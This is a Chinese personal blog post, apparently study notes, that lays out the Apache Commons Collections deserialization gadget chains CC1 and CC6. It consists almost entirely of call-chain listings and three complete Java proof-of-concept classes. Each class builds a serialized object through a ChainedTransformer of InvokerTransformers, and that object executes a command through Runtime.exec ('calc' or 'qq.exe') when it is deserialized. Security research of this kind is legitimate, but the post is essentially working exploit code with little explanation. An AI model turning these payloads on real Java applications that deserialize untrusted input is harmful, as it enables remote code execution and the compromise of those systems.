THIS IS B3c0me

记录生活中的点点滴滴

0%

CommonsCollections3

发表于 更新于 分类于

一、CC1

1.1 链条

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
ObjectInputStream.readObject()
    AnnotationInvocationHandler.readObject()
    memberValue.entrySet()
    ...
    ChainedTransformer.transform()
    ConstantTransformer.transform()
    InvokerTransformer.transform()
    Method.invoke()
    Class.getMethod()
    InvokerTransformer.transform()
    Method.invoke()
    Runtime.getRuntime()
    InvokerTransformer.transform()
    Method.invoke()
    Runtime.exec()

1.2 POC1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

public class CC101 {
    public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class},new Object[]{"getRuntime",new Class[0]}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[0]}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})

        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
//        chainedTransformer.transform(1);
       HashMap<Object,Object> hashMap = new HashMap<>();
       hashMap.put("value","value");
       Map<Object,Object> transformedMap = TransformedMap.decorate(hashMap,null,chainedTransformer);


       Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
       Constructor annotationInvocationHandler = c.getDeclaredConstructor(Class.class,Map.class);
       annotationInvocationHandler.setAccessible(true);
       Object o = annotationInvocationHandler.newInstance(Target.class, transformedMap);

       serialize(o);
       unserialize("ser.bin");
    }


    static void serialize(Object object) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(object);
    }

    static void unserialize(Object object) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("ser.bin"));
        ois.readObject();
    }
}

1.3 POC2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
public class CC1Poc2 {
    public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException {
        Transformer[] transformers;
        transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class},new Object[]{"getRuntime",new Class[0]}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[0]}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})

        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
//        chainedTransformer.transform(1);
        HashMap<Object, Object> map = new HashMap<>();
        Map<Object, Object> lazyMap = LazyMap.decorate(map,chainedTransformer);

        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationInvocationHandlerConstructor = c.getDeclaredConstructor(Class.class,Map.class);
        annotationInvocationHandlerConstructor.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) annotationInvocationHandlerConstructor.newInstance(Override.class, lazyMap);
		//创建一个Map的动态代理
        Map mapProxy = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(),new Class[]{Map.class},handler);

        Object o = annotationInvocationHandlerConstructor.newInstance(Override.class, mapProxy);

        serialize(o);

        unserialize("ser.bin");

    }

    static void serialize(Object o) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(o);
    }

    static void unserialize(Object o) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("ser.bin"));
        ois.readObject();
    }
}

二、CC6

该链不受jdk版本限制

1.1 链条

1
2
3
4
5
6
7
8
9
10
11
java.io.ObjectInputStream.readObject()
          java.util.HashSet.readObject()
              java.util.HashMap.put()
              java.util.HashMap.hash()
                  org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()
                  org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()
                      org.apache.commons.collections.map.LazyMap.get()
                          org.apache.commons.collections.functors.ChainedTransformer.transform()
                          org.apache.commons.collections.functors.InvokerTransformer.transform()
                          java.lang.reflect.Method.invoke()
                              java.lang.Runtime.exec()

1.2 POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
public class CC6Poc {
    public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"qq.exe"})
        };

        ChainedTransformer transformer = new ChainedTransformer(transformers);
        //transformer.transform(1);

        HashMap<Object, Object> hashMap = new HashMap<>();
        Map<Object, Object> lazyMap = LazyMap.decorate(hashMap, new ConstantTransformer(1));


        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "become");
        HashMap<Object, Object> hashMap1 = new HashMap<>();
        hashMap1.put(tiedMapEntry,"bbb");
        hashMap1.remove("become");

        Class c1 = LazyMap.class;
        Field factoryField = c1.getDeclaredField("factory");
        factoryField.setAccessible(true);
        factoryField.set(lazyMap,transformer);

        serialize(hashMap1);
        unserialize("ser.bin");
        
    }

    static void serialize(Object o) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(o);
    }

    static void unserialize(Object o) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("ser.bin"));
        ois.readObject();
    }

}

欢迎关注我的其它发布渠道